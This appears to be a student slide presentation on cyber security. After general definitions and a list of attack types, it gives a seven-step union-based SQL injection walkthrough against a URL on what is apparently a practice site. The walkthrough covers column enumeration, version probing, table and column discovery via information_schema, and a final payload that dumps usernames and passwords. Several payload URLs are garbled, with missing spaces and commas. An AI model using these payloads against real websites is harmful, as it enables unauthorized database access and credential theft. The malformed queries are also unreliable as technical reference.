This document summarizes the steps to perform a SQL injection attack on a vulnerable website. It begins by finding a dynamic page that interacts with a database, then determines the number of columns and vulnerable columns. Next, it checks the MySQL version number and retrieves table names from the information schema. Finally, it retrieves column names and extracts data from columns by concatenating values with delimiters. The attack was performed on http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 in 7 steps to demonstrate a SQL injection technique.
2. Cyber security
Cyber security is the practice of protecting systems,
networks, and programs from digital attacks. These
attacks are usually aimed at accessing, changing, or
destroying sensitive information; extorting money
from users; or interrupting normal business
processes.
Cyber security is the protection of internet-connected
systems, including hardware, software and data, from
cyber-attacks.
3. Why is cyber security
important?
In today’s connected world, everyone benefits from advanced cyber
defense programs. At an individual level, a cyber security attack can result
in everything from identity theft, to extortion attempts, to the loss of
important data like family photos. Everyone relies on critical infrastructure
like power plants, hospitals, and financial service companies. Securing
these and other organizations is essential to keeping our society
functioning.
Everyone also benefits from the work of cyber threat researchers, like the
team of 250 threat researchers at Talos, who investigate new and emerging
threats and cyber attack strategies. They reveal new vulnerabilities,
educate the public on the importance of cyber security, and strengthen
open source tools. Their work makes the Internet safer for everyone
4. There are many types of attacks that
are:
Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks.
Man-in-the-middle (MitM) attack.
Phishing and spear phishing attacks.
Drive-by attack.
Password attack.
SQL injection attack.
Cross-site scripting (XSS) attack.
Eavesdropping attack.
I performed only one attack:-
SQL injection attack
5. A SQL injection is a technique used to exploit the website by altering
backend SQL statements through manipulating application input.SQL
injection occurs when a web application is allowed to accept user
input is directly places into a SQL statements without filtering out
dangerous characters.
An attacker can use SQL injection to bybass authentication
6.
7. There are seven step on the basis of hack the website.
The website which hack :
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
STEP 1:-First step is to find a dynamic
page means which is interacting with
the database.
Generally these type of pages end with id =(some number)like
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
8. STEP 2:Finding
number of columns.
Now we are going to check the number of
columns and we can do this by removing the
single quota (‘) at the end and adding this to
the end of link. order by number
9. STEP 3: Gathering vulnerable
columns.
Now we have to find the columns which are vulnerable so for that after id
parameter enter UNION SELECT 1,2,3,4. Vulnerable here means those
columns which are interacting with that specific page. So when we inject
this command it will select those columns which are interacting .In this
case 2 number columns are vulnerable.
10. STEP 4: Checking MYSQL version
number.
As there are different way to proceed for different MySQL version so it is
important to determine the version.so for this replace the vulnerable
column number with version() or @@version.
Example http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
UNION SELECT 1,2,3,version(). In this case version number is 5.6.39.If the
version number > 5 easy to retrieve info because of information schema.
Similarly we can find out the database name using function
database().There are many function like version(),database(),now().
11. STEP 5: Retrieving table names.
Choose a vulnerable columns and replace it with
group_concat(table_name,0x0a) and after that from
information_schema.tables where table_schema=database()--+
Therefore for url
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1UNION
SELECT1,2,3group_concat(table_name,0x0a) from information_schema.tables
where table_schema=database()--+
12. STEP 6: Retrieving
column names.
Replace table/s with column/s except at last in which
replace table_schema=database()--+ with
table_name=CHAR(117,115,101,114,115)--+
So the final url become
http://leettime.net/sqlninja.com/tasks/basic_ch1.php
?id=1UNION
SELECT1,2,3group_concat(column_name,0x0a)frominf
ormation_schema.columns where table_name=
CHAR(117,115,101,114,115)--+
13. STEP 7:Extracting data from
columns.
So the final url for extracting data is
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1UNION
SELECT1,2,3group_concat(id,0x3a,username,0x3a,password,0x0a)f
rom users--+